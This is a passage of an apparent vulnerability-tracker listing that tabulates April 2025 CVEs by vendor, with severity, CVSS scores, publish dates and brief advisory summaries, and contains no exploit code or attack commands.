CVE-2025-30280 | Medium | 5.3 | — | 2025-04-08 | A vulnerability has been identified in Mendix Runtime V10 (All versions < V10.21.0), Mendix Runtime V10.12 (All versions < V10.12.16), Mendix Runtime V10.18 (All versions < V10.18.5), Mendix Runtime V10.6 (All versions < V10.6.22), Mendix… |
Dell · 12 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-27690 | Critical | 9.8 | — | 2025-04-10 | Dell PowerScale OneFS, versions 9.5.0.0 through 9.10.1.0, contains a use of default password vulnerability. |
CVE-2025-29986 | High | 8.3 | — | 2025-04-08 | Dell Common Event Enabler, version(s) CEE 9.0.0.0, contain(s) an Improper Restriction of Communication Channel to Intended Endpoints vulnerability in the Common Anti-Virus Agent (CAVA). |
CVE-2025-26330 | High | 7.0 | — | 2025-04-10 | Dell PowerScale OneFS, versions 9.4.0.0 through 9.10.0.1, contains an incorrect authorization vulnerability. |
CVE-2025-29988 | Medium | 6.9 | — | 2025-04-09 | Dell Client Platform BIOS contains a Stack-based Buffer Overflow Vulnerability. |
CVE-2025-22471 | Medium | 6.5 | — | 2025-04-10 | Dell PowerScale OneFS, versions 9.4.0.0 through 9.10.0.1, contains an integer overflow or wraparound vulnerability. |
CVE-2025-29985 | Medium | 6.5 | — | 2025-04-08 | Dell Common Event Enabler, version(s) CEE 9.0.0.0, contain(s) an Initialization of a Resource with an Insecure Default vulnerability in the Common Anti-Virus Agent (CAVA). |
CVE-2025-26335 | Medium | 5.8 | — | 2025-04-11 | Dell PowerProtect Cyber Recovery, versions prior to 19.18.0.2, contains an Insertion of Sensitive Information Into Sent Data vulnerability. |
CVE-2025-26480 | Medium | 5.3 | — | 2025-04-10 | Dell PowerScale OneFS, versions 9.5.0.0 through 9.10.0.0, contains an uncontrolled resource consumption vulnerability. |
CVE-2025-23378 | Low | 3.3 | — | 2025-04-10 | Dell PowerScale OneFS, versions 9.4.0.0 through 9.10.0.0, contains an exposure of information through directory listing vulnerability. |
CVE-2025-26479 | Low | 3.1 | — | 2025-04-10 | Dell PowerScale OneFS, versions 9.4.0.0 through 9.10.0.0, contains an out-of-bounds write vulnerability. |
CVE-2025-29989 | Low | 3.1 | — | 2025-04-10 | Dell Client Platform BIOS contains a Security Version Number Mutable to Older Versions vulnerability. |
CVE-2025-27686 | Low | 2.7 | — | 2025-04-07 | Dell Unisphere for PowerMax, version(s) prior to 10.2.0.9 and PowerMax version(s) prior to PowerMax 9.2.4.15, contain an Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection') vulnerability. |
Apple · 11 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2023-42970 | High | 8.8 | — | 2025-04-11 | A use-after-free issue was addressed with improved memory management. |
CVE-2023-42977 | High | 7.8 | — | 2025-04-11 | A path handling issue was addressed with improved validation. |
CVE-2023-42875 | High | 7.3 | — | 2025-04-11 | Processing web content may lead to arbitrary code execution. |
CVE-2023-41076 | High | 7.3 | — | 2025-04-11 | An app may be able to elevate privileges. |
CVE-2023-42983 | Medium | 6.4 | — | 2025-04-11 | Processing a file may lead to a denial-of-service or potentially disclose memory contents. |
CVE-2023-42982 | Medium | 6.4 | — | 2025-04-11 | Processing a file may lead to a denial-of-service or potentially disclose memory contents. |
CVE-2023-42961 | Medium | 6.3 | — | 2025-04-11 | A path handling issue was addressed with improved validation. |
CVE-2023-42981 | Medium | 5.4 | — | 2025-04-11 | Processing a file may lead to a denial-of-service or potentially disclose memory contents. |
CVE-2023-38614 | Medium | 4.3 | — | 2025-04-11 | A permissions issue was addressed with additional restrictions. |
CVE-2023-42973 | Medium | 4.0 | — | 2025-04-11 | Private Browsing tabs may be accessed without authentication. |
CVE-2023-42969 | Low | 3.3 | — | 2025-04-11 | An app may be able to break out of its sandbox. |
Fortinet · 11 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-48887 | Critical | 9.8 | — | 2025-04-08 | A unverified password change vulnerability in Fortinet FortiSwitch GUI may allow a remote unauthenticated attacker to change admin passwords via a specially crafted request |
CVE-2024-26013 | High | 7.5 | — | 2025-04-08 | A improper restriction of communication channel to intended endpoints vulnerability [CWE-923] in Fortinet FortiOS version 7.4.0 through 7.4.4, 7.2.0 through 7.2.8, 7.0.0 through 7.0.15, 6.4.0 through 6.4.15 and before 6.2.16, Fortinet Fort… |
CVE-2023-37930 | High | 7.5 | — | 2025-04-08 | Multiple issues including the use of uninitialized ressources [CWE-908] and excessive iteration [CWE-834] vulnerabilities vulnerability in Fortinet allows a VPN user to corrupt memory potentially leading to code or commands execution via… |
CVE-2025-25254 | High | 7.2 | — | 2025-04-08 | An Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability [CWE-22] in FortiWeb version 7.6.2 and below, version 7.4.6 and below, 7.2 all versions, 7.0 all versions endpoint may allow an authenticated a… |
CVE-2024-54024 | High | 7.2 | — | 2025-04-08 | An improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability [CWE-78] in Fortinet FortiIsolator before version 2.4.6 allows a privileged attacker with super-admin profile and CLI access to exe… |
CVE-2024-54025 | Medium | 6.7 | — | 2025-04-08 | An improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability [CWE-78] in Fortinet FortiIsolator CLI before version 2.4.6 allows a privileged attacker to execute unauthorized code or commands v… |
CVE-2024-46671 | Medium | 6.2 | — | 2025-04-08 | An Incorrect User Management vulnerability [CWE-286] in FortiWeb version 7.6.2 and below, version 7.4.6 and below, version 7.2.10 and below, version 7.0.11 and below widgets dashboard may allow an authenticated attacker with at least read-… |
CVE-2024-52962 | Medium | 5.3 | — | 2025-04-08 | An Improper Output Neutralization for Logs vulnerability [CWE-117] in FortiAnalyzer version 7.6.1 and below, version 7.4.5 and below, version 7.2.8 and below, version 7.0.13 and below and FortiManager version 7.6.1 and below, version 7.4.5… |
CVE-2024-50565 | Low | 3.1 | — | 2025-04-08 | A improper restriction of communication channel to intended endpoints vulnerability [CWE-923] in Fortinet FortiOS version 7.4.0 through 7.4.3, 7.2.0 through 7.2.7, 7.0.0 through 7.0.14, 6.4.0 through 6.4.15 and 6.2.0 through 6.2.16, Fortin… |
CVE-2025-22855 | Low | 2.7 | — | 2025-04-08 | An improper neutralization of input during web page generation ('Cross-site Scripting') [CWE-79] vulnerability in Fortinet FortiClient before 7.4.1 may allow the EMS administrator to send messages containing javascript code. |
CVE-2024-32122 | Low | 2.3 | — | 2025-04-08 | A storing passwords in a recoverable format in Fortinet FortiOS 7.4.0 through 7.4.8, FortiOS 7.2 all versions, FortiOS 7.0 all versions, FortiOS 6.4 all versions allows attacker to information disclosure via modification of LDAP server IP… |
Palo Alto Networks · 11 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-0120 | High | 7.0 | — | 2025-04-11 | A vulnerability with a privilege management mechanism in the Palo Alto Networks GlobalProtect™ app on Windows devices allows a locally authenticated non-administrative Windows user to escalate their privileges to NT AUTHORITY\SYSTEM. |
CVE-2025-0124 | Low | 3.8 | — | 2025-04-11 | An authenticated file deletion vulnerability in the Palo Alto Networks PAN-OS® software enables an authenticated attacker with network access to the management web interface to delete certain files as the “nobody” user; this includes limit… |
CVE-2025-0129 | — | — | — | 2025-04-11 | An improper exception check in Palo Alto Networks Prisma Access Browser allows a low privileged user to prevent Prisma Access Browser from applying it's Policy Rules. |
CVE-2025-0123 | — | — | — | 2025-04-11 | A vulnerability in the Palo Alto Networks PAN-OS® software enables unlicensed administrators to view clear-text data captured using the packet capture feature https://docs.paloaltonetworks.com/pan-os/11-0/pan-os-admin/monitoring/take-pack… |
CVE-2025-0119 | — | — | — | 2025-04-11 | A command injection vulnerability in the Palo Alto Networks Cortex XDR® Broker VM allows an authenticated user to execute arbitrary OS commands with root privileges on the host operating system running Broker VM. |
CVE-2025-0128 | — | — | — | 2025-04-11 | A denial-of-service (DoS) vulnerability in the Simple Certificate Enrollment Protocol (SCEP) authentication feature of Palo Alto Networks PAN-OS® software enables an unauthenticated attacker to initiate system reboots using a maliciously c… |
CVE-2025-0127 | — | — | — | 2025-04-11 | A command injection vulnerability in Palo Alto Networks PAN-OS® software enables an authenticated administrator to bypass system restrictions and run arbitrary commands as a root user. |
CVE-2025-0126 | — | — | — | 2025-04-11 | When configured using SAML, a session fixation vulnerability in the GlobalProtect™ login enables an attacker to impersonate a legitimate authorized user and perform actions as that GlobalProtect user. |
CVE-2025-0125 | — | — | — | 2025-04-11 | An improper input neutralization vulnerability in the management web interface of the Palo Alto Networks PAN-OS® software enables a malicious authenticated read-write administrator to impersonate another legitimate authenticated PAN-OS adm… |
CVE-2025-0122 | — | — | — | 2025-04-11 | A denial-of-service (DoS) vulnerability in Palo Alto Networks Prisma® SD-WAN ION devices enables an unauthenticated attacker in a network adjacent to a Prisma SD-WAN ION device to disrupt the packet processing capabilities of the device by… |
CVE-2025-0121 | — | — | — | 2025-04-11 | A null pointer dereference vulnerability in the Palo Alto Networks Cortex® XDR agent on Windows devices allows a low-privileged local Windows user to crash the agent. |
Pcman · 11 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3380 | High | 7.3 | — | 2025-04-07 | A vulnerability, which was classified as critical, has been found in PCMan FTP Server 2.0.7. |
CVE-2025-3379 | High | 7.3 | — | 2025-04-07 | A vulnerability classified as critical was found in PCMan FTP Server 2.0.7. |
CVE-2025-3378 | High | 7.3 | — | 2025-04-07 | A vulnerability classified as critical has been found in PCMan FTP Server 2.0.7. |
CVE-2025-3377 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in PCMan FTP Server 2.0.7. |
CVE-2025-3376 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in PCMan FTP Server 2.0.7. |
CVE-2025-3375 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in PCMan FTP Server 2.0.7. |
CVE-2025-3374 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in PCMan FTP Server 2.0.7 and classified as critical. |
CVE-2025-3373 | High | 7.3 | — | 2025-04-07 | A vulnerability has been found in PCMan FTP Server 2.0.7 and classified as critical. |
CVE-2025-3372 | High | 7.3 | — | 2025-04-07 | A vulnerability, which was classified as critical, was found in PCMan FTP Server 2.0.7. |
CVE-2025-3371 | High | 7.3 | — | 2025-04-07 | A vulnerability, which was classified as critical, has been found in PCMan FTP Server 2.0.7. |
CVE-2025-3349 | High | 7.3 | — | 2025-04-07 | A vulnerability, which was classified as critical, has been found in PCMan FTP Server 2.0.7. |
Rockwell Automation · 11 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3289 | High | 7.8 | — | 2025-04-08 | A local code execution vulnerability exists in the Rockwell Automation Arena® due to a stack-based memory buffer overflow. |
CVE-2025-3288 | High | 7.8 | — | 2025-04-08 | A local code execution vulnerability exists in the Rockwell Automation Arena® due to a threat actor being able to read outside of the allocated memory buffer. |
CVE-2025-3287 | High | 7.8 | — | 2025-04-08 | A local code execution vulnerability exists in the Rockwell Automation Arena® due to a stack-based memory buffer overflow. |
CVE-2025-3286 | High | 7.8 | — | 2025-04-08 | A local code execution vulnerability exists in the Rockwell Automation Arena® due to a threat actor being able to read outside of the allocated memory buffer. |
CVE-2025-3285 | High | 7.8 | — | 2025-04-08 | A local code execution vulnerability exists in the Rockwell Automation Arena® due to a threat actor being able to read outside of the allocated memory buffer. |
CVE-2025-2829 | High | 7.8 | — | 2025-04-08 | A local code execution vulnerability exists in the Rockwell Automation Arena® due to a threat actor being able to write outside of the allocated memory buffer. |
CVE-2025-2293 | High | 7.8 | — | 2025-04-08 | A local code execution vulnerability exists in the Rockwell Automation Arena® due to a threat actor being able to write outside of the allocated memory buffer. |
CVE-2025-2288 | High | 7.8 | — | 2025-04-08 | A local code execution vulnerability exists in the Rockwell Automation Arena® due to a threat actor being able to write outside of the allocated memory buffer. |
CVE-2025-2287 | High | 7.8 | — | 2025-04-08 | A local code execution vulnerability exists in the Rockwell Automation Arena® due to an uninitialized pointer. |
CVE-2025-2286 | High | 7.8 | — | 2025-04-08 | A local code execution vulnerability exists in the Rockwell Automation Arena® due to an uninitialized pointer. |
CVE-2025-2285 | High | 7.8 | — | 2025-04-08 | A local code execution vulnerability exists in the Rockwell Automation Arena® due to an uninitialized pointer. |
Linux · 10 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-22017 | Medium | 5.5 | — | 2025-04-08 | In the Linux kernel, the following vulnerability has been resolved: devlink: fix xa_alloc_cyclic() error handling In case of returning 1 from xa_alloc_cyclic() (wrapping) ERR_PTR(1) will be returned, which will cause IS_ERR() to be false. |
CVE-2025-22016 | Medium | 5.5 | — | 2025-04-08 | In the Linux kernel, the following vulnerability has been resolved: dpll: fix xa_alloc_cyclic() error handling In case of returning 1 from xa_alloc_cyclic() (wrapping) ERR_PTR(1) will be returned, which will cause IS_ERR() to be false. |
CVE-2025-22015 | Medium | 5.5 | — | 2025-04-08 | In the Linux kernel, the following vulnerability has been resolved: mm/migrate: fix shmem xarray update during migration A shmem folio can be either in page cache or in swap cache, but not at the same time. |
CVE-2025-22014 | Medium | 5.5 | — | 2025-04-08 | In the Linux kernel, the following vulnerability has been resolved: soc: qcom: pdr: Fix the potential deadlock When some client process A call pdr_add_lookup() to add the look up for the service and does schedule locator work, later a pr… |
CVE-2025-22013 | Medium | 5.5 | — | 2025-04-08 | In the Linux kernel, the following vulnerability has been resolved: KVM: arm64: Unconditionally save+flush host FPSIMD/SVE/SME state There are several problems with the way hyp code lazily saves the host's FPSIMD/SVE state, including: *… |
CVE-2025-22012 | Medium | 5.5 | — | 2025-04-08 | In the Linux kernel, the following vulnerability has been resolved: Revert "arm64: dts: qcom: sdm845: Affirm IDR0.CCTW on apps_smmu" There are reports that the pagetable walker cache coherency is not a given across the spectrum of SDM845… |
CVE-2025-22011 | Medium | 5.5 | — | 2025-04-08 | In the Linux kernel, the following vulnerability has been resolved: ARM: dts: bcm2711: Fix xHCI power-domain During s2idle tests on the Raspberry CM4 the VPU firmware always crashes on xHCI power-domain resume: root@raspberrypi:/sys/pow… |
CVE-2025-22010 | Medium | 5.5 | — | 2025-04-08 | In the Linux kernel, the following vulnerability has been resolved: RDMA/hns: Fix soft lockup during bt pages loop Driver runs a for-loop when allocating bt pages and mapping them with buffer pages. |
CVE-2025-22009 | Medium | 5.5 | — | 2025-04-08 | In the Linux kernel, the following vulnerability has been resolved: regulator: dummy: force synchronous probing Sometimes I get a NULL pointer dereference at boot time in kobject_get() with the following call stack: anatop_regulator_pro… |
CVE-2025-22008 | Medium | 5.5 | — | 2025-04-08 | In the Linux kernel, the following vulnerability has been resolved: regulator: check that dummy regulator has been probed before using it Due to asynchronous driver probing there is a chance that the dummy regulator hasn't already been p… |
Inaba Denki Sangyo Co., Ltd. · 8 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-27797 | Critical | 9.8 | — | 2025-04-09 | OS command injection vulnerability in the specific service exists in Wi-Fi AP UNIT 'AC-WPS-11ac series'. |
CVE-2025-25053 | High | 8.8 | — | 2025-04-09 | OS command injection vulnerability in the WEB UI (the setting page) exists in Wi-Fi AP UNIT 'AC-WPS-11ac series'. |
CVE-2025-29870 | High | 7.5 | — | 2025-04-09 | Missing authentication for critical function vulnerability exists in Wi-Fi AP UNIT 'AC-WPS-11ac series'. |
CVE-2025-27934 | High | 7.5 | — | 2025-04-09 | Information disclosure of authentication information in the specific service vulnerability exists in Wi-Fi AP UNIT 'AC-WPS-11ac series'. |
CVE-2025-25213 | Medium | 6.5 | — | 2025-04-09 | Improper restriction of rendered UI layers or frames issue exists in Wi-Fi AP UNIT 'AC-WPS-11ac series'. |
CVE-2025-27722 | Medium | 5.9 | — | 2025-04-09 | Cleartext transmission of sensitive information issue exists in Wi-Fi AP UNIT 'AC-WPS-11ac series'. |
CVE-2025-25056 | Medium | 4.3 | — | 2025-04-09 | Cross-site request forgery vulnerability exists in Wi-Fi AP UNIT 'AC-WPS-11ac series'. |
CVE-2025-23407 | Medium | 4.3 | — | 2025-04-09 | Incorrect privilege assignment vulnerability in the WEB UI (the setting page) exists in Wi-Fi AP UNIT 'AC-WPS-11ac series'. |
Apollographql · 7 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32380 | High | 7.5 | — | 2025-04-09 | The Apollo Router Core is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation 2. |
CVE-2025-32034 | High | 7.5 | — | 2025-04-07 | The Apollo Router Core is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation 2. |
CVE-2025-32033 | High | 7.5 | — | 2025-04-07 | The Apollo Router Core is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation 2. |
CVE-2025-32032 | High | 7.5 | — | 2025-04-07 | The Apollo Router Core is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation 2. |
CVE-2025-32031 | High | 7.5 | — | 2025-04-07 | Apollo Gateway provides utilities for combining multiple GraphQL microservices into a single GraphQL endpoint. |
CVE-2025-32030 | High | 7.5 | — | 2025-04-07 | Apollo Gateway provides utilities for combining multiple GraphQL microservices into a single GraphQL endpoint. |
CVE-2025-31496 | High | 7.5 | — | 2025-04-07 | apollo-compiler is a query-based compiler for the GraphQL query language. |
Google · 7 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-20656 | Medium | 6.8 | — | 2025-04-07 | In DA, there is a possible out of bounds write due to a missing bounds check. |
CVE-2025-20662 | Medium | 6.7 | — | 2025-04-07 | In PlayReady TA, there is a possible out of bounds read due to a missing bounds check. |
CVE-2025-20661 | Medium | 6.7 | — | 2025-04-07 | In PlayReady TA, there is a possible out of bounds read due to a missing bounds check. |
CVE-2025-20660 | Medium | 6.7 | — | 2025-04-07 | In PlayReady TA, there is a possible out of bounds read due to a missing bounds check. |
CVE-2025-20657 | Medium | 6.7 | — | 2025-04-07 | In vdec, there is a possible permission bypass due to improper input validation. |
CVE-2025-20658 | Medium | 6.0 | — | 2025-04-07 | In DA, there is a possible permission bypass due to a logic error. |
CVE-2025-20655 | Medium | 5.3 | — | 2025-04-07 | In keymaster, there is a possible out of bounds read due to a missing bounds check. |
Openatom · 7 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-22851 | Medium | 6.5 | — | 2025-04-07 | in OpenHarmony v5.0.2 and prior versions allow a local attacker arbitrary code execution in pre-installed apps through integer overflow. |
CVE-2025-27534 | Low | 3.3 | — | 2025-04-07 | in OpenHarmony v5.0.2 and prior versions allow a local attacker case DOS through missing release of memory. |
CVE-2025-25057 | Low | 3.3 | — | 2025-04-07 | in OpenHarmony v5.0.2 and prior versions allow a local attacker case DOS through missing release of memory. |
CVE-2025-24304 | Low | 3.3 | — | 2025-04-07 | in OpenHarmony v5.0.2 and prior versions allow a local attacker cause DOS through out-of-bounds write. |
CVE-2025-22842 | Low | 3.3 | — | 2025-04-07 | in OpenHarmony v5.0.2 and prior versions allow a local attacker cause DOS through out-of-bounds read. |
CVE-2025-22452 | Low | 3.3 | — | 2025-04-07 | in OpenHarmony v5.0.2 and prior versions allow a local attacker cause DOS through out-of-bounds read. |
CVE-2025-20102 | Low | 3.3 | — | 2025-04-07 | in OpenHarmony v5.0.2 and prior versions allow a local attacker cause DOS through out-of-bounds read. |
Suse · 7 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-23391 | Critical | 9.1 | — | 2025-04-11 | A Incorrect Privilege Assignment vulnerability in SUSE rancher allows a Restricted Administrator to change the password of Administrators and take over their accounts. |
CVE-2025-23389 | High | 8.4 | — | 2025-04-11 | A Improper Access Control vulnerability in SUSE rancher allows a local user to impersonate other identities through SAML Authentication on first login. |
CVE-2025-23388 | High | 8.2 | — | 2025-04-11 | A Stack-based Buffer Overflow vulnerability in SUSE rancher allows for denial of service.This issue affects rancher: from 2.8.0 before 2.8.13, from 2.9.0 before 2.9.7, from 2.10.0 before 2.10.3. |
CVE-2025-23386 | High | 7.8 | — | 2025-04-10 | A Incorrect Default Permissions vulnerability in the openSUSE Tumbleweed package gerbera allows the service user gerbera to escalate to root.,This issue affects gerbera on openSUSE Tumbleweed before 2.5.0-1.1. |
CVE-2024-52280 | High | 7.7 | — | 2025-04-11 | A Exposure of Sensitive Information to an Unauthorized Actor vulnerability in SUSE rancher which allows users to watch resources they are not allowed to access, when they have at least some generic permissions on the type. |
CVE-2024-52282 | Medium | 6.2 | — | 2025-04-11 | A Exposure of Sensitive Information to an Unauthorized Actor vulnerability in SUSE rancher allowing any users with GET access to the Rancher Manager Apps Catalog to read any sensitive information that are contained within the Apps’ value… |
CVE-2025-23387 | Medium | 5.3 | — | 2025-04-11 | A Exposure of Sensitive Information to an Unauthorized Actor vulnerability in SUSE rancher allowed unauthenticated users to list all CLI authentication tokens and delete them before the CLI is able to get the token value.This issue affects… |
Dnnsoftware · 6 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32373 | Medium | 6.5 | — | 2025-04-09 | DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. |
CVE-2025-32372 | Medium | 6.5 | — | 2025-04-09 | DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. |
CVE-2025-32374 | Medium | 5.9 | — | 2025-04-09 | DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. |
CVE-2025-32371 | Medium | 4.3 | — | 2025-04-09 | DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. |
CVE-2025-32036 | Medium | 4.2 | — | 2025-04-08 | DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. |
CVE-2025-32035 | Low | 2.6 | — | 2025-04-08 | DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. |
Ivanti · 6 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-22466 | High | 8.2 | — | 2025-04-08 | Reflected XSS in Ivanti Endpoint Manager before version 2024 SU1 or before version 2022 SU7 allows a remote unauthenticated attacker to obtain admin privileges. |
CVE-2025-22458 | High | 7.8 | — | 2025-04-08 | DLL hijacking in Ivanti Endpoint Manager before version 2024 SU1 or before version 2022 SU7 allows an authenticated attacker to escalate to System. |
CVE-2025-22461 | High | 7.2 | — | 2025-04-08 | SQL injection in Ivanti Endpoint Manager before version 2024 SU1 or before version 2022 SU7 allows a remote authenticated attacker with admin privileges to achieve code execution. |
CVE-2025-22465 | Medium | 6.1 | — | 2025-04-08 | Reflected XSS in Ivanti Endpoint Manager before version 2024 SU1 or before version 2022 SU7 allows a remote unauthenticated attacker to execute arbitrary javascript in a victim's browser. |
CVE-2025-22464 | Medium | 6.1 | — | 2025-04-08 | An untrusted pointer dereference vulnerability in Ivanti Endpoint Manager before version 2024 SU1 or before version 2022 SU7 allows an attacker with local access to write arbitrary data into memory causing a denial-of-service condition. |
CVE-2025-22459 | Medium | 4.8 | — | 2025-04-08 | Improper certificate validation in Ivanti Endpoint Manager before version 2024 SU1 or before version 2022 SU7 allows a remote unauthenticated attacker to intercept limited traffic between clients and servers. |
Wikimedia Foundation · 6 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3469 | — | — | — | 2025-04-10 | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation MediaWiki. |
CVE-2025-32700 | — | — | — | 2025-04-10 | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wikimedia Foundation AbuseFilter. |
CVE-2025-32699 | — | — | — | 2025-04-10 | Vulnerability in Wikimedia Foundation MediaWiki, Wikimedia Foundation Parsoid.This issue affects MediaWiki: before 1.39.12, 1.42.6, 1.43.1; Parsoid: before 0.16.5, 0.19.2, 0.20.2. |
CVE-2025-32698 | — | — | — | 2025-04-10 | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wikimedia Foundation MediaWiki. |
CVE-2025-32697 | — | — | — | 2025-04-10 | Improper Preservation of Permissions vulnerability in Wikimedia Foundation MediaWiki. |
CVE-2025-32696 | — | — | — | 2025-04-10 | Improper Preservation of Permissions vulnerability in Wikimedia Foundation MediaWiki. |
Elastic · 5 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-12556 | High | 8.7 | — | 2025-04-08 | Prototype Pollution in Kibana can lead to code injection via unrestricted file upload combined with path traversal. |
CVE-2025-25013 | Medium | 6.5 | — | 2025-04-08 | Improper restriction of environment variables in Elastic Defend can lead to exposure of sensitive information such as API keys and tokens via automatic transmission of unfiltered environment variables to the stack. |
CVE-2024-52980 | Medium | 6.5 | — | 2025-04-08 | A flaw was discovered in Elasticsearch, where a large recursion using the innerForbidCircularReferences function of the PatternBank class could cause the Elasticsearch node to crash. |
CVE-2024-52974 | Medium | 6.5 | — | 2025-04-08 | An issue has been identified where a specially crafted request sent to an Observability API could cause the kibana server to crash. |
CVE-2024-52981 | Medium | 4.9 | — | 2025-04-08 | An issue was discovered in Elasticsearch, where a large recursion using the Well-KnownText formatted string with nested GeometryCollection objects could cause a stackoverflow. |
Gitlab · 5 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-1677 | Medium | 6.5 | — | 2025-04-10 | A Denial of Service (DoS) issue has been discovered in GitLab CE/EE affecting all up to 17.8.7, 17.9 prior to 17.9.6 and 17.10 prior to 17.10.4 A denial of service could occur upon injecting oversized payloads into CI pipeline exports. |
CVE-2025-0362 | Medium | 6.4 | — | 2025-04-10 | An issue has been discovered in GitLab CE/EE affecting all versions from 7.7 before 17.8.7, 17.9 before 17.9.6, and 17.10 before 17.10.4. |
CVE-2024-11129 | Medium | 6.3 | — | 2025-04-10 | An issue has been discovered in GitLab EE affecting all versions from 17.1 before 17.8.7, 17.9 before 17.9.6, and 17.10 before 17.10.4. |
CVE-2025-2408 | Medium | 5.3 | — | 2025-04-10 | An issue has been discovered in GitLab CE/EE affecting all versions from 13.12 before 17.8.7, 17.9 before 17.9.6, and 17.10 before 17.10.4. |
CVE-2025-2469 | Low | 3.7 | — | 2025-04-10 | An issue has been discovered in GitLab CE/EE affecting all versions from 17.9 before 17.9.6, and 17.10 before 17.10.4. |
Hailey888 · 5 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3388 | Medium | 4.3 | — | 2025-04-07 | A vulnerability classified as problematic was found in hailey888 oa_system up to 2025.01.01. |
CVE-2025-3392 | Low | 3.5 | — | 2025-04-08 | A vulnerability was found in hailey888 oa_system up to 2025.01.01 and classified as problematic. |
CVE-2025-3391 | Low | 3.5 | — | 2025-04-08 | A vulnerability has been found in hailey888 oa_system up to 2025.01.01 and classified as problematic. |
CVE-2025-3390 | Low | 3.5 | — | 2025-04-08 | A vulnerability, which was classified as problematic, was found in hailey888 oa_system up to 2025.01.01. |
CVE-2025-3389 | Low | 3.5 | — | 2025-04-08 | A vulnerability, which was classified as problematic, has been found in hailey888 oa_system up to 2025.01.01. |
Phpgurukul · 5 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3370 | High | 7.3 | — | 2025-04-07 | A vulnerability classified as critical has been found in PHPGurukul Men Salon Management System 1.0. |
CVE-2025-3353 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in PHPGurukul Men Salon Management System 1.0. |
CVE-2025-3352 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in PHPGurukul Old Age Home Management System 1.0 and classified as critical. |
CVE-2025-3351 | High | 7.3 | — | 2025-04-07 | A vulnerability has been found in PHPGurukul Old Age Home Management System 1.0 and classified as critical. |
CVE-2025-3350 | High | 7.3 | — | 2025-04-07 | A vulnerability, which was classified as critical, was found in PHPGurukul Old Age Home Management System 1.0. |
Schneider Electric · 5 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2223 | High | 7.8 | — | 2025-04-09 | CWE-20: Improper Input Validation vulnerability exists that could cause a loss of Confidentiality, Integrity and Availability of engineering workstation when a malicious project file is loaded by a user from the local system. |
CVE-2025-2222 | High | 7.8 | — | 2025-04-09 | CWE-552: Files or Directories Accessible to External Parties vulnerability over https exists that could leak information and potential privilege escalation following man in the middle attack. |
CVE-2025-2442 | Medium | 6.8 | — | 2025-04-09 | CWE-1188: Initialization of a Resource with an Insecure Default vulnerability exists that could potentially lead to unauthorized access which could result in the loss of confidentially, integrity and availability when a malicious user, hav… |
CVE-2025-2441 | Medium | 4.6 | — | 2025-04-09 | CWE-1188: Initialization of a Resource with an Insecure Default vulnerability exists that could lead to loss of confidentiality when a malicious user, having physical access, sets the radio in factory default mode where the product does no… |
CVE-2025-2440 | Medium | 4.2 | — | 2025-04-09 | CWE-922: Insecure Storage of Sensitive Information vulnerability exists that could potentially lead to unauthorized access of confidential data when a malicious user, having physical access and advanced information on the file system, sets… |
Stylemix · 5 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
